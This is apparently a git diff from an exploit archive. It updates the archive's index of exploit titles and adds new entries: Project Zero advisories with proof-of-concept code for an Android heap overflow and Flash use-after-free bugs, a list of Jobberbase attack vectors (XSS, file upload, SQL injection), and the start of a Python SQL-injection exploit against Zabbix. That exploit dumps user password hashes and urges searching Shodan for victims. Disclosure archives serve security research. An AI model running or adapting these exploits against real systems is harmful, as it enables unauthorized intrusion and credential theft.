 38444,platforms/win_x86/dos/38444.py,"Tomabo MP4 Converter 3.10.12 < 3.11.12 - '.m3u' Denial of service (Crush Application)",2015-10-11,"mohammed Mohammed",win_x86,dos,0
 38445,platforms/php/webapps/38445.txt,"Joomla Real Estate Manager Component 3.7 - SQL Injection",2015-10-11,"Omer Ramić",php,webapps,0
-38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - Cross-Site Request Forgery Add Extension / Arbitrary File Upload PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0
+38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - Cross-Site Request Forgery (Add Extension) / Arbitrary File Upload / PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0
 38448,platforms/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - Directory Traversal",2015-10-13,"Karn Ganeshen",hardware,webapps,0
 38449,platforms/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0
 38450,platforms/php/webapps/38450.txt,"Kerio Control 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",php,webapps,0
@@ -34914,7 +34922,7 @@ id,file,description,date,author,platform,type,port
 38626,platforms/multiple/dos/38626.py,"FileCOPA FTP Server - Remote Denial of Service",2013-07-01,Chako,multiple,dos,0
 38627,platforms/android/remote/38627.sh,"Google Android - 'APK' code Remote Security Bypass",2013-07-03,"Bluebox Security",android,remote,0
 38628,platforms/php/webapps/38628.txt,"HostBill - 'cpupdate.php' Authentication Bypass",2013-05-29,localhost.re,php,webapps,0
-38629,platforms/php/webapps/38629.txt,"vBulletin 5.1.x - Pre-Authentication Remote Code Execution",2015-11-05,hhjj,php,webapps,0
+38629,platforms/php/webapps/38629.txt,"vBulletin 5.1.x - Unauthenticated Remote Code Execution",2015-11-05,hhjj,php,webapps,0
 38642,platforms/php/webapps/38642.txt,"Serendipity 1.6.2 - 'serendipity_admin_image_selector.php' Cross-Site Scripting",2013-07-12,"Omar Kurt",php,webapps,0
 38633,platforms/multiple/remote/38633.pl,"Intelligent Platform Management Interface - Information Disclosure",2013-07-02,"Dan Farmer",multiple,remote,0
 38634,platforms/ios/remote/38634.txt,"Air Drive Plus - Multiple Input Validation Vulnerabilities",2013-07-09,"Benjamin Kunz Mejri",ios,remote,0
@@ -35553,8 +35561,8 @@ id,file,description,date,author,platform,type,port
 39298,platforms/php/webapps/39298.txt,"WordPress Epic Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
 39299,platforms/php/webapps/39299.txt,"WordPress Antioch Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
 39300,platforms/php/webapps/39300.txt,"WordPress Spider Facebook Plugin - 'facebook.php' SQL Injection",2014-09-07,"Claudio Viviani",php,webapps,0
-39301,platforms/php/webapps/39301.html,"WordPress Ninja Forms 2.7.7 Plugin - Authorization Bypass",2014-09-08,Voxel@Night,php,webapps,0
-39302,platforms/php/webapps/39302.html,"WordPress WP to Twitter Plugin - Authorization Bypass",2014-09-08,Voxel@Night,php,webapps,0
+39301,platforms/php/webapps/39301.html,"WordPress Ninja Forms 2.7.7 Plugin - Authentication Bypass",2014-09-08,Voxel@Night,php,webapps,0
+39302,platforms/php/webapps/39302.html,"WordPress WP to Twitter Plugin - Authentication Bypass",2014-09-08,Voxel@Night,php,webapps,0
 39303,platforms/php/webapps/39303.txt,"WordPress Xhanch My Twitter Plugin - Cross-Site Request Forgery",2014-09-08,Voxel@Night,php,webapps,0
 39304,platforms/php/webapps/39304.txt,"WordPress W3 Total Cache Plugin - 'admin.php' Cross-Site Request Forgery",2014-09-08,Voxel@Night,php,webapps,0
 39305,platforms/freebsd/dos/39305.py,"FreeBSD SCTP ICMPv6 - Error Processing",2016-01-25,ptsecurity,freebsd,dos,0
@@ -35928,7 +35936,7 @@ id,file,description,date,author,platform,type,port
 39705,platforms/php/webapps/39705.txt,"WordPress Kento Post View Counter Plugin 2.8 - Cross-Site Request Forgery / Cross-Site Scripting",2016-04-18,cor3sm4sh3r,php,webapps,80
 39706,platforms/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard Coded Credentials",2016-04-18,DLY,hardware,dos,0
 39707,platforms/php/webapps/39707.txt,"Webutler CMS 3.2 - Cross-Site Request Forgery",2016-04-18,"Keerati T.",php,webapps,80
-39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk - Authenticated File Upload",2016-04-18,Metasploit,multiple,remote,80
+39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk - Authenticated Arbitrary File Upload",2016-04-18,Metasploit,multiple,remote,80
 39709,platforms/php/webapps/39709.txt,"pfSense Community Edition 2.2.6 - Multiple Vulnerabilities",2016-04-18,Security-Assessment.com,php,webapps,443
 39710,platforms/php/webapps/39710.txt,"modified eCommerce Shopsoftware 2.0.0.0 rev 9678 - Blind SQL Injection",2016-04-19,"Felix Maduakor",php,webapps,80
 39711,platforms/php/webapps/39711.php,"PHPBack 1.3.0 - SQL Injection",2016-04-20,hyp3rlinx,php,webapps,80
@@ -36094,7 +36102,7 @@ id,file,description,date,author,platform,type,port
 39965,platforms/php/webapps/39965.txt,"Tiki-Wiki CMS Calendar 14.2 / 12.5 LTS / 9.11 LTS / 6.15 - Remote Code Execution",2016-06-16,"Dany Ouellet",php,webapps,80
 39879,platforms/php/webapps/39879.txt,"Joomla SecurityCheck Extension 2.8.9 - Multiple Vulnerabilities",2016-06-02,"ADEO Security",php,webapps,80
 39880,platforms/jsp/webapps/39880.txt,"Liferay CE < 6.2 CE GA6 - Persistent Cross-Site Scripting",2016-06-02,"Fernando Câmara",jsp,webapps,0
-39881,platforms/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated File Upload",2016-06-02,"RedTeam Pentesting GmbH",php,webapps,80
+39881,platforms/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated Arbitrary File Upload",2016-06-02,"RedTeam Pentesting GmbH",php,webapps,80
 39882,platforms/multiple/dos/39882.txt,"Websockify (C Implementation) 0.8.0 - Buffer Overflow",2016-06-02,"RedTeam Pentesting GmbH",multiple,dos,0
 39884,platforms/php/webapps/39884.html,"Dream Gallery 1.0 - Cross-Site Request Forgery (Add Admin)",2016-06-06,"Ali Ghanbari",php,webapps,80
 39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86_64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,multiple,shellcode,0
@@ -36145,7 +36153,7 @@ id,file,description,date,author,platform,type,port
 39930,platforms/osx/dos/39930.c,"Apple Mac OSX - Kernel Stack Buffer Overflow in GeForce GPU Driver",2016-06-10,"Google Security Research",osx,dos,0
 39931,platforms/php/webapps/39931.txt,"FRticket Ticket System - Persistent Cross-Site Scripting",2016-06-13,"Hamit Abis",php,webapps,80
 39932,platforms/php/webapps/39932.html,"Viart Shopping Cart 5.0 - Cross-Site Request Forgery / Arbitrary File Upload",2016-06-13,"Ali Ghanbari",php,webapps,80
-39933,platforms/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal DEP + ASLR Bypass)",2016-06-13,"Fitzl Csaba",windows,local,0
+39933,platforms/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal ASLR + DEP Bypass)",2016-06-13,"Fitzl Csaba",windows,local,0
 39934,platforms/php/webapps/39934.txt,"Dream Gallery 2.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
 39935,platforms/php/webapps/39935.txt,"Grid Gallery 1.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
 39936,platforms/php/webapps/39936.txt,"Joomla PayPlans (com_payplans) Extension 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80
@@ -36179,7 +36187,7 @@ id,file,description,date,author,platform,type,port
 39964,platforms/php/webapps/39964.html,"SlimCMS 0.1 - Cross-Site Request Forgery (Change Admin Password)",2016-06-16,"Avinash Thapa",php,webapps,80
 39969,platforms/php/webapps/39969.php,"WordPress Gravity Forms Plugin 1.8.19 - Arbitrary File Upload",2016-06-17,"Abk Khan",php,webapps,80
 39970,platforms/php/webapps/39970.txt,"Vicidial 2.11 - Scripts Persistent Cross-Site Scripting",2016-06-17,"David Silveiro",php,webapps,80
-39971,platforms/php/webapps/39971.php,"phpATM 1.32 - Remote Command Execution (Arbitrary File Upload) on Windows Servers",2016-06-17,"Paolo Massenio",php,webapps,80
+39971,platforms/php/webapps/39971.php,"phpATM 1.32 - Arbitrary File Upload / Remote Command Execution (Windows Servers)",2016-06-17,"Paolo Massenio",php,webapps,80
 39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80
 39973,platforms/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution",2016-06-17,Metasploit,linux,remote,443
 39974,platforms/php/webapps/39974.html,"WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80
@@ -36288,8 +36296,8 @@ id,file,description,date,author,platform,type,port
 40112,platforms/cgi/webapps/40112.txt,"Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure",2016-07-15,Damaster,cgi,webapps,80
 40145,platforms/windows/local/40145.txt,"Rapid7 AppSpider 6.12 - Privilege Escalation",2016-07-25,LiquidWorm,windows,local,0
 40113,platforms/linux/remote/40113.txt,"OpenSSHD 7.2p2 - User Enumeration",2016-07-18,"Eddie Harari",linux,remote,22
-40114,platforms/php/webapps/40114.py,"vBulletin 5.x/4.x - Post-Authentication Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API",2014-10-12,tintinweb,php,webapps,0
-40115,platforms/php/webapps/40115.py,"vBulletin 4.x - Post-Authentication SQL Injection in breadcrumbs via xmlrpc API",2014-10-12,tintinweb,php,webapps,0
+40114,platforms/php/webapps/40114.py,"vBulletin 5.x/4.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API",2014-10-12,tintinweb,php,webapps,0
+40115,platforms/php/webapps/40115.py,"vBulletin 4.x - Authenticated SQL Injection in breadcrumbs via xmlrpc API",2014-10-12,tintinweb,php,webapps,0
 40118,platforms/windows/local/40118.txt,"Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)",2016-06-22,"Brian Pak",windows,local,0
 40119,platforms/linux/remote/40119.md,"DropBearSSHD 2015.71 - Command Injection",2016-03-03,tintinweb,linux,remote,0
 40120,platforms/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution / Escalate Privileges",2016-07-17,b0yd,hardware,remote,0
@@ -36333,7 +36341,7 @@ id,file,description,date,author,platform,type,port
 40159,platforms/hardware/webapps/40159.txt,"Compal CH7465LG-LC Modem/Router CH7465LG-NCIP-4.50.18.13-NOSH - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",hardware,webapps,80
 40160,platforms/hardware/webapps/40160.py,"Bellini/Supercook Wi-Fi Yumi SC200 - Multiple Vulnerabilities",2016-07-25,"James McLean",hardware,webapps,0
 40161,platforms/java/webapps/40161.txt,"Micro Focus Filr 2 2.0.0.421_ Filr 1.2 1.2.0.846 - Multiple Vulnerabilities",2016-07-25,"SEC Consult",java,webapps,9443
-40162,platforms/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Post-Authentication Remote Root Exploit (Metasploit)",2016-07-26,xort,linux,remote,8000
+40162,platforms/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit)",2016-07-26,xort,linux,remote,8000
 40163,platforms/php/webapps/40163.txt,"PHP File Vault 0.9 - Directory Traversal",2016-07-26,N_A,php,webapps,80
 40164,platforms/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) vmci.sys - (PoC)",2013-03-06,"Artem Shishkin",multiple,local,0
 40165,platforms/cgi/webapps/40165.txt,"Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities",2016-07-26,LiquidWorm,cgi,webapps,80
@@ -36345,13 +36353,13 @@ id,file,description,date,author,platform,type,port 40173,platforms/windows/local/40173.txt,"mySCADAPro 7 - Privilege Escalation",2016-07-29,"Karn Ganeshen",windows,local,0 40174,platforms/php/webapps/40174.txt,"WordPress Ultimate Product Catalog 3.9.8 Plugin - (do_shortcode via ajax) Blind SQL Injection",2016-07-29,"i0akiN SEC-LABORATORY",php,webapps,80 40175,platforms/win_x86/shellcode/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 -40176,platforms/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Post-Authentication Remote Root Exploit (Metasploit) (3)",2016-07-29,xort,linux,remote,8000 -40177,platforms/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Post-Authentication Remote Root Exploit (Metasploit)",2016-07-29,xort,linux,remote,8000 +40176,platforms/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit) (3)",2016-07-29,xort,linux,remote,8000 +40177,platforms/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Root Exploit (Metasploit)",2016-07-29,xort,linux,remote,8000 40178,platforms/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - SEH Overflow (Egghunter)",2016-07-29,ch3rn0byl,windows,remote,80 40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - NetCat Bind Shell with Port (44 / 52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode,0 40180,platforms/linux/webapps/40180.txt,"Trend Micro Deep Discovery 3.7 / 3.8 SP1 (3.81) / 3.8 SP2 (3.82) - hotfix_upload.cgi Filename Remote Code Execution",2016-07-29,korpritzombie,linux,webapps,443 40184,platforms/multiple/dos/40184.html,"WebKit - TypedArray.copyWithin Memory Corruption",2016-07-29,"Google Security Research",multiple,dos,0 -40185,platforms/php/webapps/40185.py,"phpMyAdmin 4.6.2 - Post-Authentication Remote Code 
Execution",2016-07-29,@iamsecurity,php,webapps,80 +40185,platforms/php/webapps/40185.py,"phpMyAdmin 4.6.2 - Authenticated Remote Code Execution",2016-07-29,@iamsecurity,php,webapps,80 40189,platforms/php/webapps/40189.txt,"WordPress Booking Calendar Plugin 6.2 - SQL Injection",2016-08-01,"Edwin Molenaar",php,webapps,80 40190,platforms/php/webapps/40190.txt,"WordPress WP Live Chat Support Plugin 6.2.03 - Persistent Cross-Site Scripting",2016-08-01,"Dennis Kerdijk & Erwin Kievith",php,webapps,80 40191,platforms/php/webapps/40191.txt,"WordPress ALO EasyMail NewsLetter Plugin 2.9.2 - (Add/Import Arbitrary Subscribers) Cross-Site Request Forgery",2016-08-01,"Yorick Koster",php,webapps,80 @@ -36386,7 +36394,7 @@ id,file,description,date,author,platform,type,port 40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 40224,platforms/windows/local/40224.txt,"Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)",2016-08-10,COSIG,windows,local,0 -40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Pre-Authentication Server Side Request Forgery (SSRF)",2016-08-10,"Dawid Golunski",php,webapps,80 +40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery (SSRF)",2016-08-10,"Dawid Golunski",php,webapps,80 40226,platforms/windows/local/40226.txt,"EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation",2016-08-10,LiquidWorm,windows,local,0 40227,platforms/php/webapps/40227.txt,"EyeLock nano NXT 3.5 - Local File Disclosure",2016-08-10,LiquidWorm,php,webapps,80 40228,platforms/php/webapps/40228.py,"EyeLock nano NXT 3.5 - Remote Root Exploit",2016-08-10,LiquidWorm,php,webapps,80 
@@ -36471,7 +36479,7 @@ id,file,description,date,author,platform,type,port
 40324,platforms/jsp/webapps/40324.txt,"ZKTeco ZKBioSecurity 3.0 - Hardcoded Credentials Remote SYSTEM Code Execution",2016-08-31,LiquidWorm,jsp,webapps,8088
 40325,platforms/jsp/webapps/40325.html,"ZKTeco ZKBioSecurity 3.0 - (Add Superadmin) Cross-Site Request Forgery",2016-08-31,LiquidWorm,jsp,webapps,8088
 40326,platforms/jsp/webapps/40326.txt,"ZKTeco ZKBioSecurity 3.0 - Directory Traversal",2016-08-31,LiquidWorm,jsp,webapps,8088
-40327,platforms/jsp/webapps/40327.txt,"ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authorization Bypass",2016-08-31,LiquidWorm,jsp,webapps,0
+40327,platforms/jsp/webapps/40327.txt,"ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authentication Bypass",2016-08-31,LiquidWorm,jsp,webapps,0
 40328,platforms/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,jsp,webapps,8088
 40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
 40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0
diff --git a/platforms/android/remote/40354.txt b/platforms/android/remote/40354.txt
new file mode 100755
index 000000000..3d58d5b11
--- /dev/null
+++ b/platforms/android/remote/40354.txt
@@ -0,0 +1,160 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=840 + +There's an inconsistency between the way that the two functions in libutils/Unicode.cpp handle invalid surrogate pairs in UTF16, resulting in a mismatch between the size calculated by utf16_to_utf8_length and the number of bytes written by utf16_to_utf8. + +This results in a heap-buffer-overflow; one route to this code is the String8 constructor initialising a String8 from a String16. This can be reached via binder calls to the core system service "android.security.keystore" from a normal app context without any additional permissions. There are probably other routes to reach this code with attacker controlled data. + +ssize_t utf16_to_utf8_length(const char16_t *src, size_t src_len) +{ + if (src == NULL || src_len == 0) { + return -1; + } + + size_t ret = 0; + const char16_t* const end = src + src_len; + while (src < end) { + if ((*src & 0xFC00) == 0xD800 && (src + 1) < end + && (*++src & 0xFC00) == 0xDC00) { // <---- increment src here even if condition is false + // surrogate pairs are always 4 bytes. 
+ ret += 4; + src++; + } else { + ret += utf32_codepoint_utf8_length((char32_t) *src++); // <---- increment src again + } + } + return ret; +} + +void utf16_to_utf8(const char16_t* src, size_t src_len, char* dst) +{ + if (src == NULL || src_len == 0 || dst == NULL) { + return; + } + + const char16_t* cur_utf16 = src; + const char16_t* const end_utf16 = src + src_len; + char *cur = dst; + while (cur_utf16 < end_utf16) { + char32_t utf32; + // surrogate pairs + if((*cur_utf16 & 0xFC00) == 0xD800 && (cur_utf16 + 1) < end_utf16 + && (*(cur_utf16 + 1) & 0xFC00) == 0xDC00) { // <---- no increment if condition is false + utf32 = (*cur_utf16++ - 0xD800) << 10; + utf32 |= *cur_utf16++ - 0xDC00; + utf32 += 0x10000; + } else { + utf32 = (char32_t) *cur_utf16++; // <---- increment src + } + const size_t len = utf32_codepoint_utf8_length(utf32); + utf32_codepoint_to_utf8((uint8_t*)cur, utf32, len); + cur += len; + } + *cur = '\0'; +} + +An example character sequence would be the following: + +\x41\xd8 \x41\xd8 \x41\xdc \x00\x00 + +This will be processed by utf16_to_utf8_len like this: + +first loop iteration: + +\x41\xd8 \x41\xd8 \x41\xdc \x00\x00 +^ +invalid surrogate; skip at (*++src & 0xfc00 == 0xdc00) + +\x41\xd8 \x41\xd8 \x41\xdc \x00\x00 + ^ + invalid surrogate; emit length 0 at (utf32_codepoint_utf8_length(*src++)) + +second loop iteration: + +\x41\xd8 \x41\xd8 \x41\xdc \x00\x00 + ^ + invalid surrogate; emit length 0 at (utf32_codepoint_utf8_length(*src++)) + +And will be processed by utf16_to_utf8 like this: + +first loop iteration: + +\x41\xd8 \x41\xd8 \x41\xdc \x00\x00 +^ +invalid surrogate; write 0 length character to output + +second loop iteration + +\x41\xd8 \x41\xd8 \x41\xdc \x00\x00 + ^ + valid surrogate pair 0xd841 0xdc41; emit length 4 character to output + +We can then construct a crash PoC using this sequence for the String16 passed to the keystore method 'getKeyCharacteristics' that will perform the String8(String16&) constructor on attacker supplied input; 
and provide a massive input string. The crash PoC should write 0x20000 * 2/3 bytes into a 2 byte heap allocation. It has been tested on a recent nexus5x userdebug build; resulting in the following crash (the object backing an android::vectorImpl has been corrupted by the overwrite, and "\xf0\xa0\x91\x81" is the utf8 encoding for the utf16 "\x41\xd8 \x41\xdc"): + +pid: 16669, tid: 16669, name: keystore >>> /system/bin/keystore <<< +signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x91a0f08191a110 + x0 8191a0f08191a108 x1 0000000000000000 x2 0000000000000000 x3 0000000000000020 + x4 00000000ffffffa0 x5 0000000000000010 x6 0000000000000001 x7 0000007f802c0018 + x8 0000000000000000 x9 000000000a7c5ac5 x10 0000000000000000 x11 0000000000000000 + x12 000000000000d841 x13 0000000000000841 x14 0000000000000041 x15 0000007f8067bd9e + x16 0000005565984f08 x17 0000007f80aeee48 x18 00000000ffffff91 x19 0000007fd1de26c0 + x20 8191a0f08191a108 x21 8191a0f08191a0f0 x22 0000000000000000 x23 0000005565984000 + x24 8191a0f08191a0f0 x25 0000007fd1dea7b8 x26 0000007f806690e0 x27 0000007fd1de25d0 + x28 000000556596f000 x29 0000007fd1de2550 x30 0000005565961188 + sp 0000007fd1de2550 pc 0000007f80aeee58 pstate 0000000060000000 + +backtrace: + #00 pc 0000000000016e58 /system/lib64/libutils.so (_ZN7android10VectorImpl13editArrayImplEv+16) + #01 pc 000000000000a184 /system/bin/keystore + #02 pc 00000000000112d0 /system/bin/keystore + #03 pc 000000000000b7f4 /system/lib64/libkeystore_binder.so (_ZN7android17BnKeystoreService10onTransactEjRKNS_6ParcelEPS1_j+1560) + #04 pc 0000000000024c9c /system/lib64/libbinder.so (_ZN7android7BBinder8transactEjRKNS_6ParcelEPS1_j+168) + #05 pc 000000000002dd98 /system/lib64/libbinder.so (_ZN7android14IPCThreadState14executeCommandEi+1240) + #06 pc 000000000002de4c /system/lib64/libbinder.so (_ZN7android14IPCThreadState20getAndExecuteCommandEv+140) + #07 pc 000000000002def4 /system/lib64/libbinder.so (_ZN7android14IPCThreadState14joinThreadPoolEb+76) + 
#08 pc 0000000000007a04 /system/bin/keystore (main+1940) + #09 pc 000000000001bc98 /system/lib64/libc.so (__libc_init+100) + #10 pc 0000000000007c20 /system/bin/keystore + +###################################################### + +Actually you can compromise many native system services using this bug (ie those not implemented in Java); because of the interface token checking code in Parcel.cpp. See attached for another PoC that takes as a first command line argument the name of the service to crash. On my nexus 5x with very unscientific testing, this includes the following services: + + - phone, iphonesubinfo, isub (com.android.phone) + - telecom, voiceinteraction, backup, audio, location, notification, connectivity, wifi, network_management, statusbar, device_policy, mount, input_method, window, content, account, telephony.registry, user, package, batterystats (system_server) + - media.audio_policy, media.audio_flinger (mediaserver) + - drm.drmManager (drmserver) + - android.security.keystore (keystore) + - SurfaceFlinger (surfaceflinger) + +bool Parcel::enforceInterface(const String16& interface, + IPCThreadState* threadState) const +{ + int32_t strictPolicy = readInt32(); + if (threadState == NULL) { + threadState = IPCThreadState::self(); + } + if ((threadState->getLastTransactionBinderFlags() & + IBinder::FLAG_ONEWAY) != 0) { + // For one-way calls, the callee is running entirely + // disconnected from the caller, so disable StrictMode entirely. + // Not only does disk/network usage not impact the caller, but + // there's no way to commuicate back any violations anyway. 
+ threadState->setStrictModePolicy(0); + } else { + threadState->setStrictModePolicy(strictPolicy); + } + const String16 str(readString16()); + if (str == interface) { + return true; + } else { + ALOGW("**** enforceInterface() expected '%s' but read '%s'", + String8(interface).string(), String8(str).string()); + return false; + } +} + + + +Proofs of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40354.zip + diff --git a/platforms/multiple/dos/40355.txt b/platforms/multiple/dos/40355.txt new file mode 100755 index 000000000..738d281e8 --- /dev/null +++ b/platforms/multiple/dos/40355.txt @@ -0,0 +1,32 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=845 + +There is an info leak in the Transform.colorTranform getter. If the constructor for ColorTransform is overwritten with a getter using addProperty, this getter will execute when fetching the constructor, which can then free the MovieClip containing the Tranform. + +A minimal PoC is as follows: + +this.createEmptyMovieClip( "mc", 1); +var c = new ColorTransform( 77, 88, 99, 0.5, 1, 2, 3, 4); +var t:Transform = new Transform( mc ); +t.colorTransform = c; +this.createTextField( "tf", 2, 0, 0, 2000, 200); +var ct = ColorTransform; +var g = flash.geom; +g.addProperty("ColorTransform", func, func); +var q = t.colorTransform; +tf.text = q.greenMultiplier + "\n" + q.blueMultiplier + "\n" + q.color; + +function func(){ + + mc.removeMovieClip(); + + return ct; + + } + + +A sample swf and fla are attached. The PoC prints the value of unallocated memory to the screen. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40355.zip + diff --git a/platforms/multiple/dos/40356.txt b/platforms/multiple/dos/40356.txt new file mode 100755 index 000000000..cf0f1c12f --- /dev/null +++ b/platforms/multiple/dos/40356.txt 
@@ -0,0 +1,21 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=846 + +If a method is called on a MovieClip, and a getter is set with the name of the method, the getter will get executed during the call, and can free the MovieClip, leading to a user-after-free. A minimal PoC is as follows: + +var mc = this.createEmptyMovieClip( "mc", 1); +mc.addProperty( "f", func, func ); +mc.f("hello"); + +function func(){ + + mc.removeMovieClip(); + // Fix heap + var d:Date = new Date(); + return d.getDate; + + } + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40356.zip + diff --git a/platforms/php/webapps/40351.txt b/platforms/php/webapps/40351.txt new file mode 100755 index 000000000..b65dd3d30 --- /dev/null +++ b/platforms/php/webapps/40351.txt 
@@ -0,0 +1,40 @@ +Jobberbase: http://www.jobberbase.com/ +Version: 2.0 +By Ross Marks: http://www.rossmarks.co.uk + +1) Local path disclosure - change any variable to an array and in most cases it will tell you the local path where the application is installed + eg. http://example.com/api/api.php?action=getJobs&type[]=0&category=0&count=5&random=1&days_behind=7&response=js + returns: Array to string conversion in /var/www/jobberbase/_lib/class.Job.php + +2) Open redirect - when submitting an application can change "Referer:" header to anything and will redirect there + +3) reflect XSS in username - http://example.com/admin/ + eg. "> + reflect XSS in search: http://example.com/search/|/ + +4) persistant XSS on admin backend homepage + create a job and give the URL: + " onhover="alert(1) + persistant XSS - admin add to category name (no protection) + +5) unrestricted file upload + upload CV accepts any filetype appends _ uniqueid() to filename + eg. "file.php" becomes "file_.php" + uniquid in in insecure method for generating random sequences and is based on microtime + if the server is using an older version of PHP a null byte can be used + ie. "test.php%00.php" would be uploaded as "test.php" + +6) code execution race condition: + if the admin has chosen to not store uploaded CV's + they are first moved from /tmp to the writable /upload directory before being unlinked + this gives a brief window of opportunity for an attacker to run http://example.com/uploads/file.php before it is deleted + +7) SQL injection in http://example.com/api/api.php?action=getJobs&type=0&category=0&count=5&random=1&days_behind=7&response=js + days_behind parameter is vulnerable + +** notes ** + +admin change password page don't need old password, no csrf token just a simple POST request. +admin password stored in md5 format unsalted +cookies do NOT have "secure" or "HTTPonly" flags enabled +no csrf anywhere 
diff --git a/platforms/php/webapps/40353.py b/platforms/php/webapps/40353.py
new file mode 100755
index 000000000..162ae3489
--- /dev/null
+++ b/platforms/php/webapps/40353.py
@@ -0,0 +1,56 @@ +# Exploit Title: 2.0 < Zabbix < 3.0.4 SQL Injection Python PoC +# Data: 20-08-2016 +# Software Link: www.zabbix.com +# Exploit Author: Unknown(http://seclists.org/fulldisclosure/2016/Aug/82) +# Version: Zabbix 2.0-3.0.x(<3.0.4) + +# PoC Author: Zzzians +# Contact: Zzzians@gmail.com +# Test on: Linux (Debian/CentOS/Ubuntu) + +# -*- coding: utf_8 -*- +# Use Shodan or and enjoy :) +# Comb the intranet for zabbix and enjoy :) +import sys,os,re,urllib2 +def Inject(url,sql,reg): + payload = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote( + sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1" + try: + response = urllib2.urlopen(payload, timeout=20).read() + except Exception, msg: + print '\t\tOpps,an error occurs...',msg + else: + result_reg = re.compile(reg) + results = result_reg.findall(response) + print payload #Uncomment this to see details + if results: + return results[0] +def exploit(url,userid): + passwd_sql = "(select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as 